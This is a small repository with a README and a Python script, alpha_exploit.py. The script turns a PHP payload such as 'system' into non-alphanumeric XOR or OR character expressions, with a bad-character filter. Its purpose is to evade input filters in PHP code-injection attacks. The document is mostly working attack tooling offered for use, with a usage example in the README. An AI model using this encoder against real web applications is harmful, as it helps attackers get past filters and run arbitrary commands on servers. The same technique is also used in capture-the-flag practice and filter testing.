├── README.md
└── alpha_exploit.py


/README.md:
--------------------------------------------------------------------------------
1 | #usage: <br>
2 | 
3 | 
4 | usage: alpha_exploit.py [-h] payload encoder badchar <br>
5 | 
6 | eg:<br>
7 | 
8 | python alpha_exploit.py system xor "\\'"
9 | 


--------------------------------------------------------------------------------
/alpha_exploit.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import sys
 3 | import string
 4 | import argparse
 5 | 
 6 | class php_encoder():
 7 | 
 8 |     def __init__(self,**kwargs):
 9 |         print("="*60 + " mucomplex " + "="*60)
10 |         self.symbolic_list = string.digits + string.printable[62:94] 
11 |         self.payload = kwargs.get('payload')
12 |         self.method = kwargs.get('method')
13 |         self.badchar(kwargs.get('badchar'))
14 |         self.counter=0
15 |         self.xor_list = []
16 |         self.or_list = []
17 |         self.php_encoder()
18 | 
19 |     def badchar(self,badchar):
20 |         for char in badchar:
21 |             self.symbolic_list = self.symbolic_list.replace(char,'')
22 | 
23 |     def php_encoder(self):
24 |         while(self.counter != len(self.payload)):
25 |             try:
26 |                 for x in self.symbolic_list:
27 |                     for y in self.symbolic_list:
28 |                         if(self.payload[self.counter] in self.symbolic_list):
29 |                             self.xor_list.append("\"" + self.payload[self.counter] +"\".")
30 |                             self.or_list.append("\"" + self.payload[self.counter] +"\".")
31 |                             self.counter += 1
32 |                             break
33 |                         elif(chr(ord(y) ^ ord(x)) == self.payload[self.counter] and self.method == 'xor'):
34 |                             self.xor_list.append("('"+x+"'^'"+y+"').")
35 |                             self.counter += 1
36 |                             #break
37 |                         elif(chr(ord(y) | ord(x)) == self.payload[self.counter] and self.method == 'or'):
38 |                             self.or_list.append("('"+x+"'|'"+y+"').")
39 |                             self.counter += 1
40 |                             #break
41 |             except:
42 |                 None
43 |         self.print_output()
44 | 
45 |     def print_output(self):
46 |         if self.method == 'xor':
47 |             print(''.join(self.xor_list)[:-1])
48 |         if self.method == 'or' :
49 |             print(''.join(self.or_list)[:-1])
50 | 
51 | parser = argparse.ArgumentParser()
52 | parser.add_argument("payload", help="input payload")
53 | parser.add_argument("encoder", help="xor or")
54 | parser.add_argument("badchar", help="including badchar")
55 | args = parser.parse_args()
56 | make = php_encoder(payload=args.payload,method=args.encoder,badchar=args.badchar)
57 | 


--------------------------------------------------------------------------------